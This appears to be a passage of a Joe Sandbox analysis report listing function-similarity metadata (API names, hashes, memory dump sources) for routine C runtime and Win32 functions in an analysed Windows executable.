                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
                                                                    • Instruction ID: 2269a4cc8c9ed2ebf6576900264b697d1c3b2887a6962c4a8a7d26c6d1716a6a
                                                                    • Opcode Fuzzy Hash: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
                                                                    • Instruction Fuzzy Hash: B4F0C865E29642A1EF45EB50F84437DA360FF8C790FA85035E94F82254CEBCD444E720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
                                                                    • Instruction ID: 94a68a259c1527def383fc8412514c449eb7fb31185f72ecda34c334d06de72e
                                                                    • Opcode Fuzzy Hash: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
                                                                    • Instruction Fuzzy Hash: 0981E122E1CA52A5F710FB6598406FCA7A4BB44B88FA08135DD0F93B95CFBCE445E720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 2398171386-0
                                                                    • Opcode ID: f8faf67a92c5f45ac7faebd5bd23c7b77134a006d9c4cb7cca87247eeb2fbdf0
                                                                    • Instruction ID: 5f949619714d8ac02577753081c7b88a87a3b9a47b20e3cd5098b7e181ff1136
                                                                    • Opcode Fuzzy Hash: f8faf67a92c5f45ac7faebd5bd23c7b77134a006d9c4cb7cca87247eeb2fbdf0
                                                                    • Instruction Fuzzy Hash: 0351E262F08A4269FB50EF75E8803BDA3B1BB487A8FA06635DE1D46ED4DE78D015D310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                    • String ID:
                                                                    • API String ID: 3659116390-0
                                                                    • Opcode ID: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
                                                                    • Instruction ID: dcbe15480e6c5ea85cd49ad249d49ac17a7238b002951bca07d81ee077f9678e
                                                                    • Opcode Fuzzy Hash: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
                                                                    • Instruction Fuzzy Hash: 1051D032E18A5199E710DF75E4403ACBBB0FB44B98FA48135DE4E87A98DFB8D146D720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                    • String ID:
                                                                    • API String ID: 262959230-0
                                                                    • Opcode ID: 7711750e0accb9ad616eeee36fa2b6d61d265f9f390964b4f40596f0c6636217
                                                                    • Instruction ID: 06c7c965e735c4c47abca31154221ae022e978446f42a631007232cfe15e7a01
                                                                    • Opcode Fuzzy Hash: 7711750e0accb9ad616eeee36fa2b6d61d265f9f390964b4f40596f0c6636217
                                                                    • Instruction Fuzzy Hash: 9B41D521E08646A9EB16FF6194043B9A394FF04BE4FA44A34EA2D877D5DFBCE1419360
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID:
                                                                    • API String ID: 190572456-0
                                                                    • Opcode ID: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
                                                                    • Instruction ID: 0a762c83325430efd94539bd882690b0219ed73768f73133514434995a90534b
                                                                    • Opcode Fuzzy Hash: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
                                                                    • Instruction Fuzzy Hash: FE410921F09A42A1FB17BB56A800679E395BF04BE0FB94935DD1D8B744EEBCE440E320
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                    • Instruction ID: c8e81c8dd80f171886bde3975f650ced771811a4e616e12fe4c864224bb666ed
                                                                    • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                    • Instruction Fuzzy Hash: 29116036E1864325F755B524F4823799341AF543B0FF5C634E66E877D78EACA440A121
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                    • String ID:
                                                                    • API String ID: 3621893840-0
                                                                    • Opcode ID: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
                                                                    • Instruction ID: 7167a50dfb3a7c7abad4a00c9ec3f79a0aec3f77c12b6d6f3232ed162eeacf06
                                                                    • Opcode Fuzzy Hash: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
                                                                    • Instruction Fuzzy Hash: 0CF04F22F3844692FB50AB70E454A76A311FFA4B05FE41030E64E41894DE6CD159D720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: __except_validate_context_recordabort
                                                                    • String ID: csm$csm
                                                                    • API String ID: 746414643-3733052814
                                                                    • Opcode ID: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
                                                                    • Instruction ID: 1406a8d2e2e9bca49b0ddc43b7fd6179c881d10631fdff4b2a72504cba72aeef
                                                                    • Opcode Fuzzy Hash: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
                                                                    • Instruction Fuzzy Hash: EB71E272D086A19ADB62AF25D05077DFBA1EB00F88FA48535DE8C47A89CF7CD491D710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: $*
                                                                    • API String ID: 3215553584-3982473090
                                                                    • Opcode ID: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
                                                                    • Instruction ID: ea6ead05c321e72fdf0c4dc5f8bbf05eb694be3ef8a92e9373c7198a3bfd83b5
                                                                    • Opcode Fuzzy Hash: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
                                                                    • Instruction Fuzzy Hash: 93519972D0C642ABE766AF74804437CB7A0FB15B0AFB41A35C64E411D9DFBCE481E625
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$StringType
                                                                    • String ID: $%s
                                                                    • API String ID: 3586891840-3791308623
                                                                    • Opcode ID: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
                                                                    • Instruction ID: 746460b6488983dbd4f7fb618419e72944250d90f4fdeb5c0e39a009d8659411
                                                                    • Opcode Fuzzy Hash: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
                                                                    • Instruction Fuzzy Hash: 7841B622F14B81AAEB11DF65E8003A9A395FB44BA8FA94635DE1E477C4DFBCE441D310
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                    • String ID: csm
                                                                    • API String ID: 2466640111-1018135373
                                                                    • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                    • Instruction ID: c0e2caeb0f4ddca9c774f422ce641661ebe57e1e0a1089abf1ff913e4f8c2bc3
                                                                    • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                    • Instruction Fuzzy Hash: 2E519E72A1874196D721EB65E44026EB7F4FB88B90FA04934DB8C47B56CF7CE450DB10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                    • String ID: U
                                                                    • API String ID: 2456169464-4171548499
                                                                    • Opcode ID: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
                                                                    • Instruction ID: 14839451672d416f6d9b6450f931d54be9b2f230a71595034d5365b5268326c3
                                                                    • Opcode Fuzzy Hash: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
                                                                    • Instruction Fuzzy Hash: C241B422A1DA8192D710DF25E8443F9B7A0FB88B94F948031EE4E87B54DFBCD451DB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectRelease
                                                                    • String ID:
                                                                    • API String ID: 1429681911-3916222277
                                                                    • Opcode ID: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
                                                                    • Instruction ID: f2fb255c0017d2d73d889bdfe139c0a7480a8ae961d11839192ba6118bf87a58
                                                                    • Opcode Fuzzy Hash: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
                                                                    • Instruction Fuzzy Hash: AC315036B0874296EB04EF12B81872AB7A0F789FD1F904435ED4A43B54CE7CE459DB10
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,00007FF731C930FF,?,?,00001000,00007FF731C7E52D), ref: 00007FF731C8E837
                                                                    • CreateSemaphoreW.KERNEL32(?,?,?,00007FF731C930FF,?,?,00001000,00007FF731C7E52D), ref: 00007FF731C8E847
                                                                    • CreateEventW.KERNEL32(?,?,?,00007FF731C930FF,?,?,00001000,00007FF731C7E52D), ref: 00007FF731C8E860
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                    • String ID: Thread pool initialization failed.
                                                                    • API String ID: 3340455307-2182114853
                                                                    • Opcode ID: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
                                                                    • Instruction ID: d7efb9ecba6d7360871279f55b35900f7a5a58f59b2793ec336e9e920a1f14ca
                                                                    • Opcode Fuzzy Hash: b988014fa09f69f29488cf01db4975baa26b0601a0ec9a12dcfa548a4564653f
                                                                    • Instruction Fuzzy Hash: C021D532E1664196F710AF28D4543AD73A1FB88B0CFA8C034CA0C4A685CFBE945597A0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDeviceRelease
                                                                    • String ID:
                                                                    • API String ID: 127614599-3916222277
                                                                    • Opcode ID: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
                                                                    • Instruction ID: 0da5156c25972975f7eb93cf8fdf4c39a441360e6a8dd9912a765e7101619598
                                                                    • Opcode Fuzzy Hash: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
                                                                    • Instruction Fuzzy Hash: 13E0C222F0864196FB0867B6B58903AA361AB4CBD0F658035DA1F43794CE3CC4E48310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                    • String ID:
                                                                    • API String ID: 1137671866-0
                                                                    • Opcode ID: 502a6960f05fcd6ff2fe25e167c9f3969daead463cb0be3bd9dc3b6afdf2e2f2
                                                                    • Instruction ID: 040d8a4a453036217f2671cf553c7c2e5836af6126814e5ea6dbf2a3b22e31a7
                                                                    • Opcode Fuzzy Hash: 502a6960f05fcd6ff2fe25e167c9f3969daead463cb0be3bd9dc3b6afdf2e2f2
                                                                    • Instruction Fuzzy Hash: 23A1F222E18B82A5EB10EB65D8942BDE371FB84794FE05131EA4D03AD9DFBCE541D720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1452528299-0
                                                                    • Opcode ID: 2fc7eb535c50cd6af4d7cf13e5e1b314b2a77eba713ff83555a04c1b224355c5
                                                                    • Instruction ID: 7dc5b00fca3602eef1e58eb61163a89591472e243645d756bc0f151f72f33e53
                                                                    • Opcode Fuzzy Hash: 2fc7eb535c50cd6af4d7cf13e5e1b314b2a77eba713ff83555a04c1b224355c5
                                                                    • Instruction Fuzzy Hash: 8151B162F14A42A9FB00BB74D4452ECA321FB88B98FA04135DA1C57B96EEACD651D360
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
